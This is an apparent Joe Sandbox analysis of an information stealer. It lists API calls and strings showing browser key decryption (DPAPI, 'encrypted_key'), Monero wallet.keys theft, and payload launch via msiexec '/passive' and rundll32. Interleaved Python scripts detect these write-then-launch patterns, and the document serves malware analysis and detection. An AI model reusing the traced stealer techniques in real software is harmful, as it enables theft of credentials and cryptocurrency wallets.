                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                        • String ID: - $%s\%s$?
                                                        • API String ID: 3246050789-3278919252
                                                        • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                        • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                        • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • memset.MSVCRT ref: 00410C1C
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                        • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                        • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                        • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                        • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                        • memset.MSVCRT ref: 00410CCD
                                                        • memset.MSVCRT ref: 00410CE1
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID: .exe
                                                        • API String ID: 1395395982-4119554291
                                                        • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                        • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                        • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
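The listing above is a write-then-run routine: the name is assembled with lstrcatA (the only string constant is ".exe"), subcall 004196C0 opens it with CreateFileA using dwDesiredAccess 0x40000000 (GENERIC_WRITE) and dwCreationDisposition 2 (CREATE_ALWAYS), and the function then calls CreateProcessA on it and waits on the result with WaitForSingleObject. That ordered API shape is a reusable triage signal. The script below is an added example, not part of the Joe Sandbox report or the sample: it parses the report's own "APIs" listing format (direct calls and "Part of subcall function" lines) into an ordered call list and flags the write-then-launch pattern. The sample listing is copied from this block; the argument positions it decodes (args[1] = dwDesiredAccess, args[4] = dwCreationDisposition) are the documented CreateFileA parameter order.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence

# Constructed sample: lines copied from the function listing above, in the form the
# report prints them (direct calls and "Part of subcall function" lines).
SAMPLE_LISTING = """\
• memset.MSVCRT ref: 00410C1C
• lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
  • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85), ref: 004196E1
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
"""

# One API line: optional subcall prefix, Api.MODULE, optional (args), then "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_?@]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 0x2


@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # callee address when reported as "Part of subcall function"


def parse_listing(text: str) -> List[Call]:
    """Turn the report's API listing into an ordered list of Call records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls


def hexarg(value: str) -> Optional[int]:
    """Decode one argument; the report prints '?' for values it could not resolve."""
    return int(value, 16) if re.fullmatch(r"[0-9A-F]{8}", value) else None


def contains_in_order(calls: Sequence[Call], pattern: Sequence[str]) -> bool:
    """True when the API names in `pattern` appear as an ordered subsequence."""
    it = iter(calls)
    return all(any(c.api == want for c in it) for want in pattern)


def find_drop_and_execute(calls: Sequence[Call]) -> Optional[dict]:
    """Flag write-then-launch: a CreateFileA opened for writing with CREATE_ALWAYS
    (args[1] = dwDesiredAccess, args[4] = dwCreationDisposition), followed later by
    CreateProcessA and a WaitForSingleObject on the result."""
    if not contains_in_order(calls, ("CreateFileA", "CreateProcessA", "WaitForSingleObject")):
        return None
    for c in calls:
        if c.api == "CreateFileA" and len(c.args) >= 5:
            access, disposition = hexarg(c.args[1]), hexarg(c.args[4])
            if access is not None and access & GENERIC_WRITE and disposition == CREATE_ALWAYS:
                return {"create_file_ref": c.ref, "in_subcall": c.subcall,
                        "launch_ref": next(x.ref for x in calls if x.api == "CreateProcessA")}
    return None


if __name__ == "__main__":
    print(find_drop_and_execute(parse_listing(SAMPLE_LISTING)))
```

The subsequence match deliberately ignores everything between the three anchor calls, so the lstrcat/memset string building does not affect it; the CreateFileA access decode is what separates this routine from a read-only file parser such as the StrStrA/CryptStringToBinaryA function earlier in the listing, which opens with 0x80000000 (GENERIC_READ) and OPEN_EXISTING (3).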
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID: image/jpeg
                                                        • API String ID: 2244384528-3785015651
                                                        • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                        • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                        • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00411307
                                                        • strtok_s.MSVCRT ref: 00411750
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                        • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                        • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExecuteShell$lstrcpy
                                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                        • API String ID: 2507796910-3625054190
                                                        • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                        • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                        • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
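The three ShellExecuteEx calls above, taken together with the function's string set, describe a launcher that picks the host process from the payload extension: ".msi" goes to C:\Windows\system32\msiexec.exe with `/i "<path>" /passive` (an install with a progress bar and no prompts), ".dll" goes to C:\Windows\system32\rundll32.exe, and ".exe" is handled by the CreateProcessA routine listed earlier. The 0x3C argument is cbSize of a 32-bit SHELLEXECUTEINFOA (60 bytes); the lone "<" in the String ID list is most likely that same constant rendered as ASCII. The detection below is an added example, not code from the report or the sample: it classifies constructed process-creation events against those three launch shapes. The user-writable path fragments and the event field names are assumptions to adapt to your own telemetry.

```python
import re
from typing import Dict, List, Optional

# Launchers the listing pairs with each payload type (both paths are strings in the function above).
MSIEXEC = r"c:\windows\system32\msiexec.exe"
RUNDLL32 = r"c:\windows\system32\rundll32.exe"
# Assumption: path fragments that mark user-writable locations; tune for your estate.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def split_cmdline(cmdline: str) -> List[str]:
    """Tokenize a Windows command line, keeping a quoted path with spaces as one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def from_user_writable(path: str) -> bool:
    lowered = path.lower()
    return any(fragment in lowered for fragment in USER_WRITABLE)


def classify_launch(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Match one process-creation event against the three launch shapes in the listing:
    msiexec /i "<pkg>" /passive, rundll32 <dll>,<entry>, or a dropped .exe run directly."""
    image = event["image"].lower()
    argv = split_cmdline(event["command_line"])
    if image == MSIEXEC:
        flags = {a.lower() for a in argv[1:] if a.startswith("/")}
        packages = [a for a in argv[1:] if a.lower().endswith(".msi")]
        if "/i" in flags and packages and from_user_writable(packages[0]):
            return {"technique": "msiexec_install", "payload": packages[0],
                    "unattended": bool(flags & {"/passive", "/qn", "/quiet"})}
    elif image == RUNDLL32 and len(argv) > 1:
        dll = argv[1].split(",", 1)[0]          # rundll32 syntax is "<dll>,<EntryPoint>"
        if dll.lower().endswith(".dll") and from_user_writable(dll):
            return {"technique": "rundll32_load", "payload": dll, "unattended": True}
    elif image.endswith(".exe") and from_user_writable(image) \
            and from_user_writable(event.get("parent_image", "")):
        # A dropped binary starting another dropped binary; parent linkage keeps this quiet.
        return {"technique": "direct_exec", "payload": event["image"], "unattended": True}
    return None


# Constructed process-creation events (not from the report): three hits and one benign uninstall.
# File names and the "Run" entry point are placeholders.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "image": r"C:\Windows\system32\msiexec.exe",
     "command_line": r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\pkg one.msi" /passive'},
    {"parent_image": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "image": r"C:\Windows\system32\rundll32.exe",
     "command_line": r"C:\Windows\system32\rundll32.exe C:\Users\u\AppData\Local\Temp\x.dll,Run"},
    {"parent_image": r"C:\Users\u\AppData\Local\Temp\dropper.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\dropped.exe",
     "command_line": r'"C:\Users\u\AppData\Local\Temp\dropped.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\system32\msiexec.exe",
     "command_line": r"C:\Windows\system32\msiexec.exe /x {PRODUCT-CODE}"},
]


def scan(events: List[Dict[str, str]]) -> List[Optional[Dict[str, object]]]:
    return [classify_launch(e) for e in events]


if __name__ == "__main__":
    for event, finding in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(event["image"], "->", finding)
```

The msiexec branch keys on the package path rather than on /passive alone, because legitimate software deployment also uses unattended installs; a package under a user profile or temp directory is what distinguishes this loader from an enterprise push. The direct-exec branch is the noisiest of the three and is only reported when the parent itself lives in a user-writable location.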
                                                        APIs
                                                        • memset.MSVCRT ref: 0041429E
                                                        • memset.MSVCRT ref: 004142B5
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                        • lstrcatA.KERNEL32(?,00829FC0), ref: 0041430B
                                                        • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                        • lstrcatA.KERNEL32(?,00829E10), ref: 00414333
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                          • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                        • StrStrA.SHLWAPI(?,0082B0F8), ref: 004143F3
                                                        • GlobalFree.KERNEL32(?), ref: 00414512
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                        • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                        • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                        • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                        • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                        APIs
                                                        • memset.MSVCRT ref: 00B34505
                                                        • memset.MSVCRT ref: 00B3451C
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B34553
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 00B34572
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34586
                                                        • lstrcat.KERNEL32(?,0064A5D8), ref: 00B3459A
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                          • Part of subcall function 00B29F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B29FA0
                                                          • Part of subcall function 00B29F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B29FF9
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                          • Part of subcall function 00B39627: GlobalAlloc.KERNEL32(00000000,00B34644,00B34644), ref: 00B3963A
                                                        • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B3465A
                                                        • GlobalFree.KERNEL32(?), ref: 00B34779
                                                          • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                          • Part of subcall function 00B29D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                          • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                          • Part of subcall function 00B29D27: LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B3470A
                                                        • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B34727
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00B34739
                                                        • lstrcat.KERNEL32(00000000,?), ref: 00B3474C
                                                        • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B3475B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                        • String ID:
                                                        • API String ID: 1191620704-0
                                                        • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction ID: 24341b310ceeee23cef13cc872ee22afcfe15281c5c347e2a6818ef9eb4ac133
                                                        • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                        • Instruction Fuzzy Hash: 5F7150B6900218BBDB14FBE0DC85FEE77B9AB49300F1085D8B609A6181EB75DB49CB51
                                                        APIs
                                                        • memset.MSVCRT ref: 00401327
                                                          • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                          • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                          • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                          • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                          • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                        • lstrlenA.KERNEL32(?), ref: 0040135C
                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                        • memset.MSVCRT ref: 00401516
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                        • API String ID: 1930502592-218353709
                                                        • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                        • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                        • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
